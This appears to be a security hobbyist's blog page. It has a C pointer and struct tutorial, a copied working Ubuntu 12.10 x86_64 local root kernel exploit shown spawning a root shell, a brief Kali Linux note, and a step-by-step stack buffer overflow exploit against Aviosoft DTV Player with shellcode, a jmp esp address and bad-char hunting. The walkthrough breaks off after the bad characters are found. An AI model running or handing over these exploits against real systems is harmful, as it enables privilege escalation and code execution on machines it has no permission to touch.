Channel: The Genius!!!

struct, typedef, array and pointer [all together?]

This post is a follow-up to http://www.pusheax.com/2013/03/struct-and-typedef-of-c-programming.html, which covered struct, pointer and typedef examples. Here I have done some more advanced things with struct:



#include <stdio.h>
#include <string.h>

int main(void)
{
    // Yes, we can store a whole sentence in a variable (remember the *):
    char *str = "We need to know programming for being a security researcher.";

    int *ptr;           // A C pointer: the declaration starts with an asterisk.
    int anotherN;       // A plain int variable.
    anotherN = 1337;    // The current value of the declared variable.
    int what;           // A blank (uninitialised) variable.

    ptr = &anotherN;    // The pointer trick: ptr now holds the address of anotherN.
    what = *ptr;        /* Dereferencing ptr reads the value stored at that address,
                           which is 1337, so what = 1337. To work with a variable
                           through a pointer we first take its address with "&" and
                           then use the asterisk to reach the value. */

    *ptr = 420;         /* anotherN's value was 1337; now it is 420. Writing through
                           the pointer changes only the variable whose address it
                           holds, so in our case "anotherN". */

    printf("\n\n\n%s\n", str);                  // Print the value of "str"
    printf("Value of what: %d\n", what);
    printf("Value of anotherN: %d\n", anotherN);

    // Time to go advanced!

    typedef struct pusheax
    {
        int push;
        char add[20];   // Using an array inside the struct is not a problem.
    } pUsheax;          // The masked (alias) name

    pUsheax instanc;    // An instance of the struct.
    pUsheax *mypusheax; // A pointer of type "pusheax". Yes, we can have a pointer to a struct.

    mypusheax = &instanc;   // Point to instanc
    instanc.push = 100;     // push = 100

    // Print the value of "push":
    printf("The current value of \"push\" is: %d\n", instanc.push);

    mypusheax->push = 200;  /* Tricky? Here we are not changing the value with the
                               asterisk. The "->" operator dereferences mypusheax and
                               selects "push", so the data goes through mypusheax into
                               instanc.push. It is a neat way to change the value. */

    printf("Now \"push\"= %d\n\n\n", instanc.push);

    strcpy(mypusheax->add, "www.pusheax.com");  /* Store the string in the "add" array.
                               strcpy is evil: it does not check boundaries, so if
                               "add" is filled with more than 20 bytes (19 characters
                               plus the terminating NUL) the stack gets overwritten,
                               i.e. a buffer overflow. A bounded copy such as
                               strncpy() is safer, but remember that strncpy() does
                               not add the NUL terminator when the source is too long,
                               so terminate the array yourself. */

    printf("\t\t\t\t\t%s\n", instanc.add);      // Print the current value of the add[20] array.
    printf("\t\t\t\t\t---------------\n");
    printf("\t\t\t\t\t%s\n\n\n", mypusheax->add);   /* We can also get the value of add[]
                                                       this way instead of instanc.add */

    return 0;
}



Compile and Run:

push@pusheax:~/code$ gcc strucptr.c -o strucptr
push@pusheax:~/code$ ./strucptr



We need to know programming for being a security researcher.
Value of what: 1337
Value of anotherN: 420
The current value of "push" is: 100
Now "push"= 200


www.pusheax.com
---------------
www.pusheax.com


push@pusheax:~/code$



Ubuntu 12.10 Local Root Exploit

Everybody knows Ubuntu is a popular Linux distro (basically for newbies). Today I was visiting exploit-db and found the Ubuntu 12.10 local root exploit, which works only on 64-bit.

I have tested the code, since I already had Ubuntu 12.10 installed on my VM.

Code:


#include<unistd.h>
#include<sys/socket.h>
#include<linux/netlink.h>
#include<netinet/tcp.h>
#include<errno.h>
#include<linux/if.h>
#include<linux/filter.h>
#include<string.h>
#include<stdio.h>
#include<stdlib.h>
#include<linux/sock_diag.h>
#include<linux/inet_diag.h>
#include<linux/unix_diag.h>
#include<sys/mman.h>

typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
_commit_creds commit_creds;
_prepare_kernel_cred prepare_kernel_cred;
unsigned long sock_diag_handlers, nl_table;

int __attribute__((regparm(3)))
x()
{
commit_creds(prepare_kernel_cred(0));
return -1;
}

char stage1[] = "\xff\x25\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";

int main() {
int fd;
unsigned long mmap_start, mmap_size = 0x10000;
unsigned family;
struct {
struct nlmsghdr nlh;
struct unix_diag_req r;
} req;
char buf[8192];

if ((fd = socket(AF_NETLINK, SOCK_RAW, NETLINK_SOCK_DIAG)) < 0){
printf("Can't create sock diag socket\n");
return -1;
}

memset(&req, 0, sizeof(req));
req.nlh.nlmsg_len = sizeof(req);
req.nlh.nlmsg_type = SOCK_DIAG_BY_FAMILY;
req.nlh.nlmsg_flags = NLM_F_ROOT|NLM_F_MATCH|NLM_F_REQUEST;
req.nlh.nlmsg_seq = 123456;

req.r.udiag_states = -1;
req.r.udiag_show = UDIAG_SHOW_NAME | UDIAG_SHOW_PEER | UDIAG_SHOW_RQLEN;

/* Ubuntu 12.10 x86_64 */
req.r.sdiag_family = 0x37;
commit_creds = (_commit_creds) 0xffffffff8107d180;
prepare_kernel_cred = (_prepare_kernel_cred) 0xffffffff8107d410;
mmap_start = 0x1a000;

if (mmap((void*)mmap_start, mmap_size, PROT_READ|PROT_WRITE|PROT_EXEC,
MAP_SHARED|MAP_FIXED|MAP_ANONYMOUS, -1, 0) == MAP_FAILED) {

printf("mmap fault\n");
exit(1);
}

*(unsigned long *)&stage1[sizeof(stage1)-sizeof(&x)] = (unsigned long)x;
memset((void *)mmap_start, 0x90, mmap_size);
memcpy((void *)mmap_start+mmap_size-sizeof(stage1), stage1, sizeof(stage1));

send(fd, &req, sizeof(req), 0);
if(!getuid())
system("/bin/sh");
}




test@weird:~/Documents$ gcc -o ubu *
test@weird:~/Documents$ ls
test.c ubu
test@weird:~/Documents$ ./ubu
# whoami
root





This is really great!

Source: http://www.exploit-db.com/exploits/24746/

Backtrack reborn as Kali - downloaded Kali Linux

BackTrack has been reborn as Kali Linux. Yesterday I downloaded Kali Linux from http://www.kali.org/downloads/; it has GNOME as the default DE (classic mode). Most penetration testers know about BackTrack Linux, which was Ubuntu based. Now it is based on Debian, which is a big advantage. It is also nicer that they made it simpler and it looks beautiful.

It seems they did not include many new tools; maybe they even excluded some tools from Kali Linux. There is also no directory called /pentest any more.

All tools are installed in /usr/bin and /usr/local/sbin. People now need to search for the tools with locate, whereis etc. if they don't know the tool's name. Truthfully, Kali (BackTrack Linux) is now a bit hard for newbies, and newbies should not try this pentesting distribution. But believe me, it is now good enough.


Note: using tools does not make you a skid. Everybody uses tools; the operating system itself is a tool. Skids are those who do things without knowing anything. You are good to go with the new Kali Linux if you are good with Linux (Debian).

Kali: http://www.kali.org/downloads/

Exploit writing - Stack based Buffer overflow

There are many exploit writing tutorials, but Corelan's exploit writing tutorials are much, much better. If you want to learn exploit development, of course you may get started with Corelan too. Anyway,

Today I tried to exploit an application found at http://www.exploit-db.com/exploits/22932/ (the exploit script did not work for me). Exploiting the vulnerability was very easy, but finding the bad chars was a bit tricky. In the end I was able to find all the bad chars using Corelan's mona.py and exploited the application successfully. I used the following tools to develop the exploit:

1. VMware Workstation.

2. Python.

3. Immunity Debugger.

4. mona.py (copy mona.py to "C:\Program Files\Immunity Inc\Immunity Debugger\PyCommands").

5. Windows XP SP3 and Windows 7.

6. Metasploit.


If you are going to try or build this exploit yourself, you also need the tools above, so make sure to download them as preparation.

I downloaded the vulnerable application first and installed it on the Windows XP SP3 VM.


                                      CRASH AND LENGTH OF BUFFER

The simple crash script was:

print "Creating exploit."
f = open("crash-me.PLF", "w")
push = "A" * 2000

try:
    f.write(push)
    f.close()
    print "File created"
except IOError:
    print "File cannot be created"


It will create a file "crash-me.PLF". If I open the file in Aviosoft DTV Player, it just crashes. Well, let's attach Immunity Debugger to see what is happening.


Click on Debug >> Run.



Now let's open "crash-me.PLF":



So it finally crashed, and I saw that the ESP and EIP registers contain "AAAAAAAA....":



This clearly indicates that I control EIP, which means the crash is really exploitable (explained later!). Now it is time to find how many bytes on the stack are required to overwrite EIP. Time to work with a great tool, mona.py. There was an old, odd way to do that, but now we can do it very easily with Metasploit or mona.py. We already know the application crashed when we sent 2000 bytes of junk, so we will create a cyclic pattern using mona.

First I set the default working folder for mona:

mona config -set workingfolder c:\mona\%p


Then the mona command is:
!mona pattern_create 2000



It just created a file called "pattern.txt" in C:\mona\AviosoftDTV. This time I need to edit the script again and put the cyclic pattern in place of "A". The full script looks like this:

print "Creating exploit."
f = open("crash-me.PLF", "w")

# 2000-byte cyclic pattern generated by mona (split across lines for readability)
push = ("Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9"
        "Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9"
        "Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9"
        "As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9"
        "Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9"
        "Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9"
        "Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9"
        "Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9"
        "Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9"
        "Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9"
        "Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9"
        "Co0Co1Co2Co3Co4Co5Co")

try:
    f.write(push)
    f.close()
    print "File created"
except IOError:
    print "File cannot be created"

The "A"*2000 has been replaced with the pattern generated by mona.


Now I need to regenerate the "crash-me.PLF" file and open it with Aviosoft DTV (already attached to the debugger). The application crashes again, but with mona's cyclic pattern instead of "AAAAAA...". So I need to take note of the EIP value. In my case it is "37694136":




This time we need to figure out the exact number of bytes needed to overwrite EIP. For this mona is enough:

!mona pattern_offset 37694136






It tells us that we need 260 bytes to fill the stack, and 4 more bytes to overwrite EIP. So it is 260+4=264 bytes.


Let's modify the script again:

print "Creating exploit."
f = open("crash-me.PLF", "w")  # Create the file

push = "A" * 260    # Found by mona.py
eip = "BBBB"        # 4 more bytes to overwrite EIP
junk = "C" * 1736   # Later this will be replaced with real shellcode

try:
    f.write(push + eip + junk)
    f.close()
    print "File created"
except IOError:
    print "File cannot be created"

In the script I replaced the cyclic pattern with 260 bytes of "A", then 4 more bytes "BBBB" to overwrite EIP, then 1736 bytes (2000-264). If the first junk length (260 bytes) is right, EIP will be "BBBB". Let's try:



See, EIP is 42424242 = BBBB and ESP (the stack pointer) contains CCCC... But here I see another problem: right after EIP there is some "CCCC":

0012EB5C   42424242  BBBB
0012EB60 43434343 CCCC
0012EB64 43434343 CCCC
0012EB68 43434343 CCCC
0012EB6C 43434343 CCCC



We really need to jump over this nasty junk; see later on. Anyway, we see that we are controlling EIP, because it holds "BBBB".

Our next goals are:

1. Replacing "BBBB" with a valid pointer (a pointer to ESP; ESP will hold the shellcode).
2. Solving the easy problem of the "CCCC..." after EIP.
3. Replacing "CCCCCC..." with real shellcode.


                                                                  FIND EIP
Let's find an address for EIP. It can be found in the application's DLLs or in the OS DLLs. For reliability we should always try to use the application's DLLs if possible, so in this application I am going to take the EIP address from an application DLL. Again I will use mona (mona is very powerful and I know what I am doing). So the command is:

!mona jmp -r esp -o




It will create a file called "jmp.txt" in "C:\mona\AviosoftDTV" with the following contents:

0x6034c153 : jmp esp |  {PAGE_EXECUTE_READWRITE} [Configuration.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.2.5.2007 (C:\Program Files\Aviosoft\Aviosoft DTV Player Pro\Configuration.dll)
0x6034c4db : jmp esp | {PAGE_EXECUTE_READWRITE} [Configuration.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.2.5.2007 (C:\Program Files\Aviosoft\Aviosoft DTV Player Pro\Configuration.dll)
0x6034d9cb : jmp esp | {PAGE_EXECUTE_READWRITE} [Configuration.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.2.5.2007 (C:\Program Files\Aviosoft\Aviosoft DTV Player Pro\Configuration.dll)
0x6034dc73 : jmp esp | {PAGE_EXECUTE_READWRITE} [Configuration.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.2.5.2007 (C:\Program Files\Aviosoft\Aviosoft DTV Player Pro\Configuration.dll)
0x640614e3 : jmp esp | {PAGE_EXECUTE_READWRITE} [MediaPlayerCtrl.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2.0.0.2 (C:\Program Files\Aviosoft\Aviosoft DTV Player Pro\MediaPlayerCtrl.dll)
0x640627a3 : jmp esp | {PAGE_EXECUTE_READWRITE} [MediaPlayerCtrl.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2.0.0.2 (C:\Program Files\Aviosoft\Aviosoft DTV Player Pro\MediaPlayerCtrl.dll)
0x64119bc3 : jmp esp | {PAGE_EXECUTE_READWRITE} [NetReg.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.12.11.2006 (C:\Program Files\Aviosoft\Aviosoft DTV Player Pro\NetReg.dll)
0x6411a7ab : jmp esp | {PAGE_EXECUTE_READWRITE} [NetReg.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.12.11.2006 (C:\Program Files\Aviosoft\Aviosoft DTV Player Pro\NetReg.dll)




Here I will use 0x6411a7ab. Before that, for learning purposes, let's find this address manually using Immunity Debugger itself (first we need to trigger the crash, otherwise not all DLLs are loaded):

1. Immunity Debugger menu: View >> View Executable Modules.
2. Find "NetReg.dll" and double click on it.
3. Our goal is finding "JMP ESP".
4. Right click on the window and choose Search For >> All Commands.




5. Another window will pop up; search for "jmp esp".


I kept searching until I found 0x6411a7ab.



                             ATTEMPT TO EXECUTE SHELLCODE
Anyway, let's get back to real work. We need to modify the script and put the address in the EIP variable instead of "BBBB". Remember that Windows on x86 is little endian, which means we need to reverse the bytes of the address, so EIP should be "0x6411a7ab = \xab\xa7\x11\x64". Here is the modified script:

print "Creating exploit."
f = open("crash-me.PLF", "w")  # Create the file

push = "A" * 260            # Found by mona.py
eip = "\xab\xa7\x11\x64"    # EIP: 0x6411a7ab (jmp esp) in little-endian byte order
junk = "C" * 1500           # Later this will be replaced with real shellcode

try:
    f.write(push + eip + junk)
    f.close()
    print "File created"
except IOError:
    print "File cannot be created"
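
To see what mona's pattern_create / pattern_offset and the little-endian packing of the EIP address actually do, here is an added example in Python 3 (my own code, not from the original post and not mona's). It re-creates the 2000-byte cyclic pattern, recovers the offset 260 from the crashed EIP value 37694136, and builds the post's push + eip + junk layout with 0x6411a7ab packed as \xab\xa7\x11\x64.

```python
import string
import struct

# Added example, not code from the original post: a re-implementation of the
# cyclic-pattern technique that "!mona pattern_create" / "!mona pattern_offset"
# perform, plus the little-endian packing applied to the jmp esp address.


def pattern_create(length):
    """Return the classic Aa0Aa1Aa2... cyclic pattern, cut to `length` chars.

    Each 3-char group (upper, lower, digit) is unique for the first 20280
    bytes, so any 4 consecutive bytes identify their position in the buffer.
    """
    groups = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                groups.append(upper + lower + digit)
                if len(groups) * 3 >= length:
                    return "".join(groups)[:length]
    return "".join(groups)[:length]


def pattern_offset(pattern, reg_value):
    """Locate a 32-bit register value (as shown by the debugger) in `pattern`.

    x86 is little-endian, so the four bytes that overwrote EIP appear in the
    file in reversed order; the raw order is tried as a fallback. Returns the
    offset, or -1 if the value is not part of the pattern.
    """
    little = struct.pack("<I", reg_value).decode("latin-1")
    big = struct.pack(">I", reg_value).decode("latin-1")
    for needle in (little, big):
        idx = pattern.find(needle)
        if idx != -1:
            return idx
    return -1


def little_endian(addr):
    """Pack a 32-bit address the way it must appear in the file: low byte first."""
    return struct.pack("<I", addr)


def build_layout(offset, ret_addr, total):
    """Filler up to EIP, then the return address, then padding to `total` bytes
    (the post's push + eip + junk layout, before any shellcode is added)."""
    if total < offset + 4:
        raise ValueError("buffer too small to reach EIP")
    filler = b"A" * offset
    tail = b"C" * (total - offset - 4)
    return filler + little_endian(ret_addr) + tail


def main():
    pattern = pattern_create(2000)
    offset = pattern_offset(pattern, 0x37694136)   # value the post read from EIP
    print("EIP offset:", offset)                   # 260
    buf = build_layout(offset, 0x6411a7ab, 2000)   # jmp esp in NetReg.dll (from the post)
    print(len(buf), buf[offset:offset + 4])        # 2000 b'\xab\xa7\x11d'


if __name__ == "__main__":
    main()
```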



Let's run the application through the debugger; EIP should now hold the exact address I set. Time to make the application execute the shellcode. So I am modifying the script again to make it safer:

print "Creating exploit."
f = open("crash-me.PLF", "w")  # Create the file

push = "\x90" * 260         # Found by mona.py; "A" replaced with NOPs
eip = "\xab\xa7\x11\x64"    # EIP
junk = "\x90" * 500         # More NOPs before reaching the shellcode
shellcode = "D" * 1000      # Will be replaced with shellcode.
try:
    f.write(push + eip + junk + shellcode)
    f.close()
    print "File created"
except IOError:
    print "File cannot be created"


What I did in the above script is just replace all "A" with NOPs. A NOP does nothing but pass to the next instruction (not a bad idea?). I mentioned earlier that after EIP we see some unnecessary "CCCCCC..." which would completely break our exploit; putting in enough NOPs solves this problem too. Before going to the next step, let's test whether it is working as I expected.

1. Set a breakpoint at the EIP address 0x6411a7ab to make sure our exploit reaches the right address. To do that:

Right click >> Go to >> Expression



2. When the new window pops up, search for the EIP address (you may need to search twice). If the address is found, we will see this:




3. Now press F2. It may warn you about setting a breakpoint at this address, but you can ignore the warning. Now I open the file (attached to the debugger). It hits the breakpoint, and I can see that I am landing in the NOPs directly:



So it worked!


Let's put real shellcode in place of "D". It is time to use Metasploit to generate windows/exec shellcode that runs calc.exe:

msfpayload windows/exec cmd=calc R |msfencode -b "\x00\x0a" -t c




I tried to avoid the common bad chars "\x00\x0a", and Metasploit generated the following shellcode (the bytes used in the script below):

[*] x86/shikata_ga_nai succeeded with size 223 (iteration=1)







Anyway, let's modify the script again:


print "Creating exploit."
f = open("crash-me.PLF", "w")  # Create the file

push = "\x90" * 260         # Found by mona.py
eip = "\xab\xa7\x11\x64"    # EIP
junk = "\x90" * 500         # 500 NOPs before the real shellcode
shellcode = ("\xbe\x28\xc7\x1b\x1f\xd9\xed\xd9\x74\x24\xf4\x58\x31\xc9\xb1"
             "\x32\x31\x70\x12\x83\xe8\xfc\x03\x58\xc9\xf9\xea\x64\x3d\x74"
             "\x14\x94\xbe\xe7\x9c\x71\x8f\x35\xfa\xf2\xa2\x89\x88\x56\x4f"
             "\x61\xdc\x42\xc4\x07\xc9\x65\x6d\xad\x2f\x48\x6e\x03\xf0\x06"
             "\xac\x05\x8c\x54\xe1\xe5\xad\x97\xf4\xe4\xea\xc5\xf7\xb5\xa3"
             "\x82\xaa\x29\xc7\xd6\x76\x4b\x07\x5d\xc6\x33\x22\xa1\xb3\x89"
             "\x2d\xf1\x6c\x85\x66\xe9\x07\xc1\x56\x08\xcb\x11\xaa\x43\x60"
             "\xe1\x58\x52\xa0\x3b\xa0\x65\x8c\x90\x9f\x4a\x01\xe8\xd8\x6c"
             "\xfa\x9f\x12\x8f\x87\xa7\xe0\xf2\x53\x2d\xf5\x54\x17\x95\xdd"
             "\x65\xf4\x40\x95\x69\xb1\x07\xf1\x6d\x44\xcb\x89\x89\xcd\xea"
             "\x5d\x18\x95\xc8\x79\x41\x4d\x70\xdb\x2f\x20\x8d\x3b\x97\x9d"
             "\x2b\x37\x35\xc9\x4a\x1a\x53\x0c\xde\x20\x1a\x0e\xe0\x2a\x0c")
shellcode += "\x90" * 900   # Need enough junk, so NOPs instead of "A"

all = push + eip + junk + shellcode

try:
    f.write(all)
    f.close()
    print "File created"
except IOError:
    print "File cannot be created"




Well, I regenerated the "crash-me.PLF" file and opened it with the attached Aviosoft DTV, but unfortunately it just crashed....


It does not even land in the NOPs (wtf!). It seems to be happening because of bad chars: some code has been truncated. No problem, we can find the bad chars using mona, and this was my new knowledge today: learning to use mona to find bad chars easily. Bad chars can corrupt or truncate our shellcode. If there are any bad chars, our exploit won't work!


So instead of spending much time, I am going to use mona to find the bad chars (this will be a good idea). I am using the first crash PoC again. Let's see how I did it.

                                                      FINDING BAD CHARS
First command:
!mona bytearray -b "\x00"

"\x00" is a common bad char, so I excluded it while generating all the byte values with mona.

Mona created two files in C:\mona\AviosoftDTV: 1. bytearray.txt, 2. bytearray.bin. bytearray.bin is the binary version, which we will need later for comparing.


Well, bytearray.txt has the following contents:




Modify the script and put the generated output right after the variable push="A"*2000:

print "Creating exploit."
f = open("badchar.PLF", "w")  # Create the file

push = "A" * 2000   # Found by mona.py
push += ("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
         "\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
         "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
         "\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
         "\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
         "\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
         "\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
         "\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")

try:
    f.write(push)
    f.close()
    print "File created"
except IOError:
    print "File cannot be created"



Now generate the file "badchar.PLF". Attach the debugger to the application, run it, open "badchar.PLF" and use another mona command:

!mona compare -f C:\mona\AviosoftDTV\bytearray.bin



It will create another file called "compare.txt", and we will see something like this:




Open "compare.txt" in Notepad and search for "stack" (http://pastebin.com/YLCnyne7); after scrolling down a little I can see:

                | File           | Memory         | Note       
---------------------------------------------------------------
0 0 9 9 | 01 ... 09 | 01 ... 09 | unmodified!
---------------------------------------------------------------
9 9 99 100 | 0a ... 6c | 00 ... 61 | expanded
108 109 1 1 | 6d | 6d | unmodified!
109 110 5 5 | 6e 6f 70 71 72 | 20 46 69 6c 65 | corrupted
114 115 1 1 | 73 | 73 | unmodified!
115 116 2 2 | 74 75 | 5c 41 | corrupted
117 118 1 1 | 76 | 76 | unmodified!
118 119 137 137 | 77 ... ff | 69 ... 00 | corrupted

Possibly bad chars: 0a
Bytes omitted from input: 00




It compares the file's data with memory. If there are no bad chars, the File and Memory data will be the same. Look at this row from the output above:

9   9   99  100 | 0a ... 6c      | 00 ... 61      | expanded 

Unfortunately it did not match. Mona also suggests that the bad char may be "0a", because "0a" from the file does not match memory... is it?



So this time we need to generate the bytearray again:

!mona bytearray -b "\x00\x0a"

Now we need to compare with the bytearray again (see above, it is the same procedure).... Just keep doing this until all the bad chars are found.
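
The bytearray / compare loop described above, as an added example in Python 3 (my own code, not from the original post and not mona's). Because the real application is not available offline, the "application" here is a constructed stand-in that mangles input in a way modelled on the five bad chars the post ends up with (NUL truncation, LF expanded to CR LF, a few bytes silently dropped); that behaviour is an assumption for demonstration, not a statement about Aviosoft DTV.

```python
# Added example, not code from the original post: the "!mona bytearray" ->
# send -> "!mona compare" loop for finding bad characters, run offline
# against a constructed stand-in for the vulnerable parser.


def bytearray_without(excluded):
    """Equivalent of `!mona bytearray -b "..."`: all byte values 0x00-0xff
    except the ones already known to be bad."""
    return bytes(b for b in range(256) if b not in excluded)


def simulated_target(data):
    """Constructed stand-in for the vulnerable application (an assumption, NOT
    the real Aviosoft DTV code). It stops at a NUL, expands LF to CR LF and
    drops CR, 0x1a and 0xff, i.e. the five bad chars the post ended up with."""
    out = bytearray()
    for b in data:
        if b == 0x00:
            break                  # C-string handling truncates at NUL
        if b == 0x0a:
            out += b"\r\n"         # text-mode style LF -> CR LF expansion
        elif b in (0x0d, 0x1a, 0xff):
            continue               # silently dropped
        else:
            out.append(b)
    return bytes(out)


def compare(sent, memory):
    """Like `!mona compare`: return the first byte of `sent` that is not found
    unmodified at the same position in `memory`, or None when everything
    matches. A dropped or expanded byte shifts all later bytes, so the first
    mismatch is the byte to exclude next."""
    for i, b in enumerate(sent):
        if i >= len(memory) or memory[i] != b:
            return b
    return None


def find_bad_chars(target, known=(0x00,)):
    """Repeat bytearray -> send -> compare, excluding each newly found bad byte,
    until the whole array survives unmodified. Returns the sorted bad bytes."""
    bad = set(known)
    while True:
        arr = bytearray_without(bad)
        first_bad = compare(arr, target(arr))
        if first_bad is None:
            return sorted(bad)
        bad.add(first_bad)


def main():
    found = find_bad_chars(simulated_target)
    print("bad chars:", "".join("\\x%02x" % b for b in found))  # \x00\x0a\x0d\x1a\xff


if __name__ == "__main__":
    main()
```

One caveat when doing this against a real target: a PoC file opened with "w" on Windows is in text mode, and Python itself turns \x0a into \x0d\x0a before the application ever reads the file, so write PoC files with "wb" to avoid blaming the target for bad chars introduced by your own generator.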

                             



                                              EXECUTE SHELLCODE
With mona I found that the bad chars are "\x00\xff\x0a\x0d\x1a". After finding these bad chars I regenerated the shellcode:

